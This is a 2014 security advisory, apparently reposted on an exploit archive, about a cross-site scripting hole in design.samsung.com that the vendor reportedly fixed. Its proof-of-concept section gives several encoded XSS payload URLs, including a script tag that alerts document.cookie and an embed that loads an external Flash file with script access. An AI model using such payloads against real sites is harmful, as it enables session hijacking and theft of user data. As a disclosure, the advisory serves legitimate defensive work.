Samsung Cross Site Scripting

Samsung Cross Site Scripting: Posted Jun 11, 2014; Authored by Robert Garcia; design.samsung.com suffered from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | f6d47c73257707a25b4b14cfb56ae59b58145d7e696aa688cb0b097804f23436; Download | Favorite | View

Samsung Cross Site Scripting


****************************************************************************
***************************************
Advisory: design.samsung.com– Cross-Site Script Vulnerability (XSS) Advisory
ID: 03062014
Author: Roberto Garcia (@1gbDeInfo)
Affected Software: Successfully tested on  design.samsung.com Vendor URL:
http://www.design.samsung.com  Vendor Status: informed and solved
****************************************************************************
***************************************


**************************
Vulnerability Description
**************************

The website " design.samsung.com " is prone to a XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.


**************************
PoC-Exploit
**************************

 
http://www.design.samsung.com/global/#search?q=data:text/html,/*%3Cimg%20src
=x%20%27-alert%280%29-%27%20onerror=alert%281%29%3E*/alert%281%29

  http://www.design.samsung.com/global/#search?q=http://goo.gl/58yW2K

 
http://www.design.samsung.com/global/#search?q=%3Cembed/src=//v.ifeng.com/in
clude/exterior.swf?AutoPlay=false&guid=045d77fb-6777-405f-8b66-5bd85afc16ea%
20allowScriptAccess=always%3E

 
http://www.design.samsung.com/global/#search?q=%E2%80%9C%3E%3Cscript%3Ealert
%28document.cookie%29%3C/script%3E

PoC video is available at
https://mega.co.nz/#F!Ot5kERSS!5If3znRA2IOnAOrMZAAnlw


**************************
Solution
**************************

  Solved, but have not notified me anything

**************************
Disclosure Timeline
**************************

- Report vuln Jun 03, 2014 via email to askdesign@samsung.com. I sent a
video with the POC.
- Website revised June 10. Solved, but nobody tells me

**************************
Credits
**************************

Vulnerability found and advisory written by Roberto Garcia


Best regards.

Roberto Garcia Amoriz

Linkedin: es.linkedin.com/in/rogaramo/
Web:  http://www.1gbdeinformacion.com
Twitter: @1gbdeinfo

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Samsung Cross Site Scripting

Samsung Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Samsung Cross Site Scripting

Share This

Samsung Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems